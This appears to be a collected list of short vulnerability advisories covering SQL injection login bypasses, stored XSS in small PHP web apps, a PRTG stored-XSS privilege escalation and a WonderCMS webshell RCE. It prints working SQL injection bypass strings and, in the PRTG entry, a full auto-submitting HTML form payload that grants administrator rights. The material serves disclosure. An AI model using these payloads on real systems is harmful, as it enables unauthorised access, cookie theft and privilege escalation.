An attacker can gain admin panel access using malicious sql injection quiries by entering a payload of ' or '1'='1 in both the fields (User ID & Password) of the login page.
This vulnerability can results attacker to inject the XSS payload in the Setting - Menu and each time any user will visits the website directory, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
An authentication bypass vulnerability exists in Local Service Search Engine Management System 1.0 due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a malicious request with payload Aditya' or 1=1# in user and password field to bypass authentication and gain access to the application.
This vulnerability can result in the attacker to inject the XSS payload in the Title field of the page and each time any user will open the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
A persistent cross-site scripting vulnerability exists in Bakeshop Online Ordering System 1.0. An attacker can inject malicious JavaScript code into the 'Category' input field of the 'Categories' page in the admin dashboard. When a user visits the page, the malicious code will be executed in the user's browser.
An attacker can inject malicious JavaScript code into the 'username' field of the Online Voting System Project in PHP. This code will be stored in the database and will be executed when the user logs in to the account. This can be used to steal user credentials or redirect the user to a malicious website.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
Since there is a stored XSS affecting 'maps' in the system, a malicious user can escalte his/her privilege to PRTG Administrator. Steps: 1- Login to PRTG system and view source code (currentUserId) 2- Create a map, add an element, double click the element and modify the HTML section 'HTML After' 3- In 'HTML After' add the following code: <form action="http://<PRTG_SERVER>:8081/editsettings" method="POST" enctype="multipart/form-data"> <input type="hidden" name="name_" value="PRTG Administrators" /> <input type="hidden" name="defaulthome_" value="/welcome.htm" /> <input type="hidden" name="isadgroup" value="0" /> <input type="hidden" name="adusertype_" value="0" /> <input type="hidden" name="aduserack_" value="0" /> <input type="hidden" name="users_" value="1" /> <input type="hidden" name="users_" value="1" /> <input type="hidden" name="users__check" value="<currentUserId>|<YOUR_USERNAME>|" /> <input type="hidden" name="users__check" value="100|PRTG System Administrator|" /> <input type="hidden" name="id" value="200" /> <input type="hidden" name="targeturl" value="/systemsetup.htm?tabid=6" /> <input type="submit" value="Submit request" /> </form> <svg/onload='document.forms[0].submit()'/> 4- Save and share the link with PRTG Administrator. 5- Login with the highest privilege.
WonderCMS is vulnerable to Authenticated Remote Code Execution. In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS. Using the theme/plugin installer attacker can install crafted plugin that contain a webshell and get RCE.
Services By CQR